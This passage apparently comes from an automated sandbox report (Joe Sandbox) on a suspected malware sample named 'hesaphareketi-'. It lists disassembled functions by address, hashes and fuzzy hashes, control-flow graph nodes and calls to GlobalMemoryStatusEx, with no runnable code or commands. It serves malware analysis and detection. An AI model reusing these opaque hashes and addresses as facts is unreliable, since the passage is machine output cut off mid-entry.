                                            • Instruction ID: ace71402e105f9dddcc2f422a0b7b7c31ca1df7c4b9a3aea44e16a4aaf4c25bc
                                            • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                            • Instruction Fuzzy Hash: DF11D376504280CFCF16CF14D5C4B16BFB1FBA8314F24C6A9D9494B656C336D85ACBA2
                                            Function 00BAD1CF Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2061401821.0000000000BAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BAD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_bad000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                            • Instruction ID: 3f987c55742dddc642ccde5cec8584f1eeb0b034def6ca6e4324491dc3d654f4
                                            • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                            • Instruction Fuzzy Hash: CE118B75508380DFDB16CF14D5C4B15BBA1FB85314F24C6A9D84A4B6A6C33AD84ACB62
                                            Function 00B9D7C5 Relevance: .0, Instructions: 45COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2060465705.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b9d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 41a2820e55120b2cb063358ce13bf9a4abde43f6510b62efe922172fd960fdc1
                                            • Instruction ID: c68cda7ddd7c9cefbc2faf74330e35b77ae8bf1788a5129b78c562e8a7c2087c
                                            • Opcode Fuzzy Hash: 41a2820e55120b2cb063358ce13bf9a4abde43f6510b62efe922172fd960fdc1
                                            • Instruction Fuzzy Hash: D401FC310043409ADF208A5BCDC4756BFDCEF55320F14C4BAED091A257C23D9C00C671
                                            Function 00B9D7C4 Relevance: .0, Instructions: 36COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2060465705.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b9d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 29cafa0aa826aa2cbf4aba5efe77502e01e1b7d3f45ee65bb4526d2259618c59
                                            • Instruction ID: e4a6beec61cb9e572c5c3b4ac8a95daac72b383e20b647a6b5ce16a47a0cd266
                                            • Opcode Fuzzy Hash: 29cafa0aa826aa2cbf4aba5efe77502e01e1b7d3f45ee65bb4526d2259618c59
                                            • Instruction Fuzzy Hash: 74F06271405344AEEB108E1ADDC4B62FFE8EF55774F18C4AAED485A287C2799844CAB1

                                            Non-executed Functions

                                            Function 049B8658 Relevance: 1.4, Strings: 1, Instructions: 171COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071884045.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_49b0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID: 0-3916222277
                                            • Opcode ID: 64095b9c0977c8800c1117f1a9aa0902ab411edd7f5fde0a24d813eed1352436
                                            • Instruction ID: a31ef1a44fd3e6e001badd2eee510237514eb552257cdedc732960e2571a35bb
                                            • Opcode Fuzzy Hash: 64095b9c0977c8800c1117f1a9aa0902ab411edd7f5fde0a24d813eed1352436
                                            • Instruction Fuzzy Hash: 7D51CD35B101058FCB14DF6DD9805AEBBF6FBC8219B14857AE509DB359EB34EC028B90
                                            Function 049B0040 Relevance: .3, Instructions: 315COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071884045.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_49b0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d7feabb5198623c674cb025ee6966c1c6d28ca36e66344f266fa9c5da877a4fb
                                            • Instruction ID: 139b1ec2540eb52dda203a7bcae1f785575fe6f9fc6f3248ab3ff64772641ad9
                                            • Opcode Fuzzy Hash: d7feabb5198623c674cb025ee6966c1c6d28ca36e66344f266fa9c5da877a4fb
                                            • Instruction Fuzzy Hash: 7212B4B0D817468AD752DFA5F84C1893BB2BB85319FD04B09E2612F2E5DBB8117ACF44
                                            Function 0229E02C Relevance: .3, Instructions: 264COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2065247066.0000000002290000.00000040.00000800.00020000.00000000.sdmp, Offset: 02290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2290000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c915dcc96bd6c21bf766f5438ca8ad3c4420fb04e11d6e985865015083dbe355
                                            • Instruction ID: 1e0c02656dd653d3a557ee4b63b3540fb5a453b29eef843991a129c540cbe134
                                            • Opcode Fuzzy Hash: c915dcc96bd6c21bf766f5438ca8ad3c4420fb04e11d6e985865015083dbe355
                                            • Instruction Fuzzy Hash: F0A14B32E2030A8FCF09DFB4C9445AEB7B2FF85304B15456AE805AB269DB31E956CF40
                                            Function 049B0007 Relevance: .2, Instructions: 239COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071884045.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_49b0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4ced9efdc3995f821f9be560784d16e7f7b46de2523c24d0c98be56193ae30e0
                                            • Instruction ID: c6f04ba177be0ea60b206eea2b782233cc7e1e0779a640bb01e2f146b2c50b19
                                            • Opcode Fuzzy Hash: 4ced9efdc3995f821f9be560784d16e7f7b46de2523c24d0c98be56193ae30e0
                                            • Instruction Fuzzy Hash: F6C115B0C817468BD712DFA5F84C1897BB2BB85319F944B09E2616F2E1DBB8147ACF44
                                            Function 049B7758 Relevance: .1, Instructions: 125COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071884045.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_49b0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dd58152184546d209f528e3398f8c0cfb90805994913d766714576f70e996f22
                                            • Instruction ID: 040bf1a41fc56b2750ae55b18c038560543e140dd885a49121b71d00c96567af
                                            • Opcode Fuzzy Hash: dd58152184546d209f528e3398f8c0cfb90805994913d766714576f70e996f22
                                            • Instruction Fuzzy Hash: 0C411478E5111E9FDF14CFA9E9819EDF3B2BF89304B14E215E016EB295DA31A801CB44

                                            Execution Graph

                                            Execution Coverage:8.9%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:45
                                            Total number of Limit Nodes:8
                                            execution_graph 40296 1700848 40297 170084e 40296->40297 40298 170091b 40297->40298 40300 1701342 40297->40300 40302 1701356 40300->40302 40301 1701448 40301->40297 40302->40301 40304 1707061 40302->40304 40305 170706b 40304->40305 40306 1707121 40305->40306 40309 65ad4ca 40305->40309 40319 65ad288 40305->40319 40306->40302 40311 65ad4d6 40309->40311 40313 65ad29d 40309->40313 40310 65ad4b2 40310->40306 40312 65ad699 40311->40312 40324 65ae050 40311->40324 40328 65ae060 40311->40328 40312->40306 40313->40310 40315 65ad4ca GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 40313->40315 40316 65ad4d8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 40313->40316 40314 65ad61a 40314->40306 40315->40313 40316->40313 40320 65ad29d 40319->40320 40321 65ad4b2 40320->40321 40322 65ad4d8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 40320->40322 40323 65ad4ca GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 40320->40323 40321->40306 40322->40320 40323->40320 40332 65ae098 40324->40332 40340 65ae088 40324->40340 40325 65ae06e 40325->40314 40329 65ae06e 40328->40329 40330 65ae098 2 API calls 40328->40330 40331 65ae088 2 API calls 40328->40331 40329->40314 40330->40329 40331->40329 40333 65ae0cd 40332->40333 40334 65ae0a5 40332->40334 40348 65ad254 40333->40348 40334->40325 40336 65ae0ee 40336->40325 40338 65ae1b6 GlobalMemoryStatusEx 40339 65ae1e6 40338->40339 40339->40325 40341 65ae0cd 40340->40341 40342 65ae0a5 40340->40342 40343 65ad254 GlobalMemoryStatusEx 40341->40343 40342->40325 40344 65ae0ea 40343->40344 40345 65ae0ee 40344->40345 40346 65ae1b6 GlobalMemoryStatusEx 40344->40346 40345->40325 40347 65ae1e6 40346->40347 40347->40325 40349 65ae170 GlobalMemoryStatusEx 40348->40349 40351 65ae0ea 40349->40351 40351->40336 40351->40338

                                            Executed Functions

                                            Function 01709BB8 Relevance: 2.8, Instructions: 2807COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 20d7c465667fca4b327dc4d172c68bd61588cb8721ff622f622de3a8ad560d56
                                            • Instruction ID: 42f1da9a071cbbc5ad105a76c6af988a82566fff2efc0a295c7d974f027f2c97
                                            • Opcode Fuzzy Hash: 20d7c465667fca4b327dc4d172c68bd61588cb8721ff622f622de3a8ad560d56
                                            • Instruction Fuzzy Hash: 3D53E631D10B1ACACB51EF68C8805A9F7B1FF99300F15D79AE4587B121EB70AAD5CB81
                                            Function 01704A60 Relevance: 2.8, Strings: 2, Instructions: 266COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2053 1704a60-1704ac6 2055 1704b10-1704b12 2053->2055 2056 1704ac8-1704ad3 2053->2056 2057 1704b14-1704b2d 2055->2057 2056->2055 2058 1704ad5-1704ae1 2056->2058 2064 1704b79-1704b7b 2057->2064 2065 1704b2f-1704b3b 2057->2065 2059 1704ae3-1704aed 2058->2059 2060 1704b04-1704b0e 2058->2060 2062 1704af1-1704b00 2059->2062 2063 1704aef 2059->2063 2060->2057 2062->2062 2066 1704b02 2062->2066 2063->2062 2068 1704b7d-1704b95 2064->2068 2065->2064 2067 1704b3d-1704b49 2065->2067 2066->2060 2069 1704b4b-1704b55 2067->2069 2070 1704b6c-1704b77 2067->2070 2075 1704b97-1704ba2 2068->2075 2076 1704bdf-1704be1 2068->2076 2071 1704b57 2069->2071 2072 1704b59-1704b68 2069->2072 2070->2068 2071->2072 2072->2072 2074 1704b6a 2072->2074 2074->2070 2075->2076 2077 1704ba4-1704bb0 2075->2077 2078 1704be3-1704bfb 2076->2078 2079 1704bb2-1704bbc 2077->2079 2080 1704bd3-1704bdd 2077->2080 2085 1704c45-1704c47 2078->2085 2086 1704bfd-1704c08 2078->2086 2081 1704bc0-1704bcf 2079->2081 2082 1704bbe 2079->2082 2080->2078 2081->2081 2084 1704bd1 2081->2084 2082->2081 2084->2080 2087 1704c49-1704cbc 2085->2087 2086->2085 2088 1704c0a-1704c16 2086->2088 2097 1704cc2-1704cd0 2087->2097 2089 1704c18-1704c22 2088->2089 2090 1704c39-1704c43 2088->2090 2092 1704c24 2089->2092 2093 1704c26-1704c35 2089->2093 2090->2087 2092->2093 2093->2093 2094 1704c37 2093->2094 2094->2090 2098 1704cd2-1704cd8 2097->2098 2099 1704cd9-1704d39 2097->2099 2098->2099 2106 1704d49-1704d4d 2099->2106 2107 1704d3b-1704d3f 2099->2107 2109 1704d5d-1704d61 2106->2109 2110 1704d4f-1704d53 2106->2110 2107->2106 2108 1704d41 2107->2108 2108->2106 2111 1704d71-1704d75 2109->2111 2112 1704d63-1704d67 2109->2112 2110->2109 2113 1704d55 2110->2113 2115 1704d85-1704d89 2111->2115 2116 1704d77-1704d7b 2111->2116 2112->2111 2114 1704d69 2112->2114 2113->2109 2114->2111 2118 1704d99-1704d9d 2115->2118 2119 1704d8b-1704d8f 2115->2119 2116->2115 2117 1704d7d 2116->2117 2117->2115 2121 1704dad 2118->2121 2122 1704d9f-1704da3 2118->2122 2119->2118 2120 1704d91-1704d94 call 1700ab8 2119->2120 2120->2118 2125 1704dae 2121->2125 2122->2121 2124 1704da5-1704da8 call 1700ab8 2122->2124 2124->2121 2125->2125
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ],{h$],{h
                                            • API String ID: 0-1926652952
                                            • Opcode ID: 55a987bdc109bd0a0f9ecf13fb69ab394ad34172341e93d575f54280296126a0
                                            • Instruction ID: b677d096b8d61a7532d02a76f98f9f51a73eb98adc15ea057db206482f2959e5
                                            • Opcode Fuzzy Hash: 55a987bdc109bd0a0f9ecf13fb69ab394ad34172341e93d575f54280296126a0
                                            • Instruction Fuzzy Hash: C7B16FB0E00709CFDF11CFA9D98179EFBF2AF88314F148529D616A7294EB749881CB81
                                            Function 01703E48 Relevance: 2.7, Strings: 2, Instructions: 238COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2201 1703e48-1703eae 2203 1703eb0-1703ebb 2201->2203 2204 1703ef8-1703efa 2201->2204 2203->2204 2206 1703ebd-1703ec9 2203->2206 2205 1703efc-1703f54 2204->2205 2215 1703f56-1703f61 2205->2215 2216 1703f9e-1703fa0 2205->2216 2207 1703ecb-1703ed5 2206->2207 2208 1703eec-1703ef6 2206->2208 2210 1703ed7 2207->2210 2211 1703ed9-1703ee8 2207->2211 2208->2205 2210->2211 2211->2211 2212 1703eea 2211->2212 2212->2208 2215->2216 2217 1703f63-1703f6f 2215->2217 2218 1703fa2-1703fba 2216->2218 2219 1703f71-1703f7b 2217->2219 2220 1703f92-1703f9c 2217->2220 2224 1704004-1704006 2218->2224 2225 1703fbc-1703fc7 2218->2225 2222 1703f7d 2219->2222 2223 1703f7f-1703f8e 2219->2223 2220->2218 2222->2223 2223->2223 2226 1703f90 2223->2226 2228 1704008-1704056 2224->2228 2225->2224 2227 1703fc9-1703fd5 2225->2227 2226->2220 2229 1703fd7-1703fe1 2227->2229 2230 1703ff8-1704002 2227->2230 2236 170405c-170406a 2228->2236 2231 1703fe3 2229->2231 2232 1703fe5-1703ff4 2229->2232 2230->2228 2231->2232 2232->2232 2234 1703ff6 2232->2234 2234->2230 2237 1704073-17040d3 2236->2237 2238 170406c-1704072 2236->2238 2245 17040e3-17040e7 2237->2245 2246 17040d5-17040d9 2237->2246 2238->2237 2248 17040f7-17040fb 2245->2248 2249 17040e9-17040ed 2245->2249 2246->2245 2247 17040db 2246->2247 2247->2245 2251 170410b 2248->2251 2252 17040fd-1704101 2248->2252 2249->2248 2250 17040ef-17040f2 call 1700ab8 2249->2250 2250->2248 2255 170410f 2251->2255 2252->2251 2254 1704103-1704106 call 1700ab8 2252->2254 2254->2251 2256 1704111-1704115 2255->2256 2257 170411f-1704123 2255->2257 2256->2257 2259 1704117-170411a call 1700ab8 2256->2259 2260 1704133-1704137 2257->2260 2261 1704125-1704129 2257->2261 2259->2257 2262 1704147-1704188 2260->2262 2263 1704139-170413d 2260->2263 2261->2260 2265 170412b 2261->2265 2262->2255 2268 170418a-17041f6 2262->2268 2263->2262 2266 170413f 2263->2266 2265->2260 2266->2262 2271 1704240-1704242 2268->2271 2272 17041f8-1704203 2268->2272 2274 1704244-170425d 2271->2274 2272->2271 2273 1704205-1704211 2272->2273 2275 1704213-170421d 2273->2275 2276 1704234-170423e 2273->2276 2281 17042a9-17042ab 2274->2281 2282 170425f-170426b 2274->2282 2277 1704221-1704230 2275->2277 2278 170421f 2275->2278 2276->2274 2277->2277 2280 1704232 2277->2280 2278->2277 2280->2276 2283 17042ad-1704305 2281->2283 2282->2281 2284 170426d-1704279 2282->2284 2293 1704307-1704312 2283->2293 2294 170434f-1704351 2283->2294 2285 170427b-1704285 2284->2285 2286 170429c-17042a7 2284->2286 2288 1704287 2285->2288 2289 1704289-1704298 2285->2289 2286->2283 2288->2289 2289->2289 2290 170429a 2289->2290 2290->2286 2293->2294 2296 1704314-1704320 2293->2296 2295 1704353-170436b 2294->2295 2302 17043b5-17043b7 2295->2302 2303 170436d-1704378 2295->2303 2297 1704322-170432c 2296->2297 2298 1704343-170434d 2296->2298 2300 1704330-170433f 2297->2300 2301 170432e 2297->2301 2298->2295 2300->2300 2304 1704341 2300->2304 2301->2300 2306 17043b9-170441e 2302->2306 2303->2302 2305 170437a-1704386 2303->2305 2304->2298 2307 1704388-1704392 2305->2307 2308 17043a9-17043b3 2305->2308 2315 1704420-1704426 2306->2315 2316 1704427-1704487 2306->2316 2309 1704394 2307->2309 2310 1704396-17043a5 2307->2310 2308->2306 2309->2310 2310->2310 2312 17043a7 2310->2312 2312->2308 2315->2316 2323 1704497-170449b 2316->2323 2324 1704489-170448d 2316->2324 2326 17044ab-17044af 2323->2326 2327 170449d-17044a1 2323->2327 2324->2323 2325 170448f 2324->2325 2325->2323 2329 17044b1-17044b5 2326->2329 2330 17044bf-17044c3 2326->2330 2327->2326 2328 17044a3 2327->2328 2328->2326 2329->2330 2331 17044b7-17044ba call 1700ab8 2329->2331 2332 17044d3-17044d7 2330->2332 2333 17044c5-17044c9 2330->2333 2331->2330 2334 17044e7-17044eb 2332->2334 2335 17044d9-17044dd 2332->2335 2333->2332 2337 17044cb-17044ce call 1700ab8 2333->2337 2339 17044fb-17044ff 2334->2339 2340 17044ed-17044f1 2334->2340 2335->2334 2338 17044df-17044e2 call 1700ab8 2335->2338 2337->2332 2338->2334 2344 1704501-1704505 2339->2344 2345 170450f 2339->2345 2340->2339 2343 17044f3 2340->2343 2343->2339 2344->2345 2346 1704507 2344->2346 2347 1704510 2345->2347 2346->2345 2347->2347
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ],{h$],{h
                                            • API String ID: 0-1926652952
                                            • Opcode ID: 8faa6928e4d6ededab1bf88157d34824ac697d47020cbb0dbfd0c2cdf206cb54
                                            • Instruction ID: b3c36c7ea4cabe1f883597267618d7376235fb8e77b90c9bbd32acc1738955cc
                                            • Opcode Fuzzy Hash: 8faa6928e4d6ededab1bf88157d34824ac697d47020cbb0dbfd0c2cdf206cb54
                                            • Instruction Fuzzy Hash: D49139B0E00309DFDB11CFA9C98579DFBF2BF88314F148129E519A7294EB749886CB91
                                            Function 0170CE38 Relevance: 2.3, Instructions: 2333COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 02f4619dd033645c9622f3ee3173f9b04fc04fe4f1c4d06dc809193fc0f87558
                                            • Instruction ID: 71615d3e1a46a903428c0f48eb17af84d9d51f2ed3ae732211d3db9cf4810bde
                                            • Opcode Fuzzy Hash: 02f4619dd033645c9622f3ee3173f9b04fc04fe4f1c4d06dc809193fc0f87558
                                            • Instruction Fuzzy Hash: 6E331C31D10719CEDB11EF68C8846ADF7B1FF99300F15C69AE448A7261EB70AAD5CB81
                                            Function 01709400 Relevance: .6, Instructions: 615COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2b1c667bf09cf026aae7a9c42022d2003408d4774d54d266acfeb76f24278b6b
                                            • Instruction ID: f8437a368d9f6d1a13f6cceae87837376763d21e42a6edb0355b66a8b2bc3b91
                                            • Opcode Fuzzy Hash: 2b1c667bf09cf026aae7a9c42022d2003408d4774d54d266acfeb76f24278b6b
                                            • Instruction Fuzzy Hash: 8A327D75A00205CFDB15CFA8D984BADBBF2EB88314F148469E609EB396DB34DC41CB90
                                            Function 065AE098 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1320 65ae098-65ae0a3 1321 65ae0cd-65ae0ec call 65ad254 1320->1321 1322 65ae0a5-65ae0cc call 65ad248 1320->1322 1328 65ae0ee-65ae0f1 1321->1328 1329 65ae0f2-65ae151 1321->1329 1335 65ae153-65ae156 1329->1335 1336 65ae157-65ae1e4 GlobalMemoryStatusEx 1329->1336 1339 65ae1ed-65ae215 1336->1339 1340 65ae1e6-65ae1ec 1336->1340 1340->1339
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4501591917.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_65a0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ],{h
                                            • API String ID: 0-2799107760
                                            • Opcode ID: 9e64bbb9a08491fd4a3fa764b055e9d448d1875f63b22eab364faa18e76386bc
                                            • Instruction ID: 27faa35b80cb025f1eea1314ae4529f3c744699dc03d1b66a61368a7045a5385
                                            • Opcode Fuzzy Hash: 9e64bbb9a08491fd4a3fa764b055e9d448d1875f63b22eab364faa18e76386bc
                                            • Instruction Fuzzy Hash: 8E410271E043598FCB04DFB9D8056EEBBF5BF89210F14866AE418A7241DB389841CBE0
                                            Function 065AE168 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1343 65ae168-65ae1ae 1344 65ae1b6-65ae1e4 GlobalMemoryStatusEx 1343->1344 1345 65ae1ed-65ae215 1344->1345 1346 65ae1e6-65ae1ec 1344->1346 1346->1345
                                            APIs
                                            • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,065AE0EA), ref: 065AE1D7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4501591917.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_65a0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: GlobalMemoryStatus
                                            • String ID: ],{h
                                            • API String ID: 1890195054-2799107760
                                            • Opcode ID: 8be18f42d441d5f9c0863379fdd47fe23ed69d9b8d164614fc90022e395db1d7
                                            • Instruction ID: b585847bf665f124be2becba94d16f1661d7626072c028ee694f536f62b7594e
                                            • Opcode Fuzzy Hash: 8be18f42d441d5f9c0863379fdd47fe23ed69d9b8d164614fc90022e395db1d7
                                            • Instruction Fuzzy Hash: B51103B1C006699FCB10DF9AD545BEEFBF5BF48320F14816AE418A7240D778A940CFA5
                                            Function 065AD254 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1349 65ad254-65ae1e4 GlobalMemoryStatusEx 1352 65ae1ed-65ae215 1349->1352 1353 65ae1e6-65ae1ec 1349->1353 1353->1352
                                            APIs
                                            • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,065AE0EA), ref: 065AE1D7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4501591917.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_65a0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: GlobalMemoryStatus
                                            • String ID: ],{h
                                            • API String ID: 1890195054-2799107760
                                            • Opcode ID: c81dd4e99829266bee037866b482c15b9bb727e776596899a0384dc7df99003a
                                            • Instruction ID: aca1c442e269f87d9186de074c607277b4d03624cbd9af929f1fabf123137391
                                            • Opcode Fuzzy Hash: c81dd4e99829266bee037866b482c15b9bb727e776596899a0384dc7df99003a
                                            • Instruction Fuzzy Hash: 291103B1C006699BCB10DF9AC545BAEFBF4FF48310F10856AE818A7240D378A944CFE5
                                            Function 01704A56 Relevance: 2.8, Strings: 2, Instructions: 260COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2127 1704a56-1704ac6 2129 1704b10-1704b12 2127->2129 2130 1704ac8-1704ad3 2127->2130 2131 1704b14-1704b2d 2129->2131 2130->2129 2132 1704ad5-1704ae1 2130->2132 2138 1704b79-1704b7b 2131->2138 2139 1704b2f-1704b3b 2131->2139 2133 1704ae3-1704aed 2132->2133 2134 1704b04-1704b0e 2132->2134 2136 1704af1-1704b00 2133->2136 2137 1704aef 2133->2137 2134->2131 2136->2136 2140 1704b02 2136->2140 2137->2136 2142 1704b7d-1704b95 2138->2142 2139->2138 2141 1704b3d-1704b49 2139->2141 2140->2134 2143 1704b4b-1704b55 2141->2143 2144 1704b6c-1704b77 2141->2144 2149 1704b97-1704ba2 2142->2149 2150 1704bdf-1704be1 2142->2150 2145 1704b57 2143->2145 2146 1704b59-1704b68 2143->2146 2144->2142 2145->2146 2146->2146 2148 1704b6a 2146->2148 2148->2144 2149->2150 2151 1704ba4-1704bb0 2149->2151 2152 1704be3-1704bfb 2150->2152 2153 1704bb2-1704bbc 2151->2153 2154 1704bd3-1704bdd 2151->2154 2159 1704c45-1704c47 2152->2159 2160 1704bfd-1704c08 2152->2160 2155 1704bc0-1704bcf 2153->2155 2156 1704bbe 2153->2156 2154->2152 2155->2155 2158 1704bd1 2155->2158 2156->2155 2158->2154 2161 1704c49-1704c7f 2159->2161 2160->2159 2162 1704c0a-1704c16 2160->2162 2170 1704c87-1704cbc 2161->2170 2163 1704c18-1704c22 2162->2163 2164 1704c39-1704c43 2162->2164 2166 1704c24 2163->2166 2167 1704c26-1704c35 2163->2167 2164->2161 2166->2167 2167->2167 2168 1704c37 2167->2168 2168->2164 2171 1704cc2-1704cd0 2170->2171 2172 1704cd2-1704cd8 2171->2172 2173 1704cd9-1704d39 2171->2173 2172->2173 2180 1704d49-1704d4d 2173->2180 2181 1704d3b-1704d3f 2173->2181 2183 1704d5d-1704d61 2180->2183 2184 1704d4f-1704d53 2180->2184 2181->2180 2182 1704d41 2181->2182 2182->2180 2185 1704d71-1704d75 2183->2185 2186 1704d63-1704d67 2183->2186 2184->2183 2187 1704d55 2184->2187 2189 1704d85-1704d89 2185->2189 2190 1704d77-1704d7b 2185->2190 2186->2185 2188 1704d69 2186->2188 2187->2183 2188->2185 2192 1704d99-1704d9d 2189->2192 2193 1704d8b-1704d8f 2189->2193 2190->2189 2191 1704d7d 2190->2191 2191->2189 2195 1704dad 2192->2195 2196 1704d9f-1704da3 2192->2196 2193->2192 2194 1704d91-1704d94 call 1700ab8 2193->2194 2194->2192 2199 1704dae 2195->2199 2196->2195 2198 1704da5-1704da8 call 1700ab8 2196->2198 2198->2195 2199->2199
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.4490894238.0000000001700000.00000040.00000800.00020000.00000000.sdmp, Offset: 01700000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1700000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ],{h$],{h
                                            • API String ID: 0-1926652952
                                            • Opcode ID: 559d67749dfcc217e99921a6bfdca27976f14d021cbba99403bb9f294253f860
                                            • Instruction ID: 6933edebee734957ea2a3d870e2bcf4fb47adbc924a35df54cdccdd3eccaf0af
                                            • Opcode Fuzzy Hash: 559d67749dfcc217e99921a6bfdca27976f14d021cbba99403bb9f294253f860
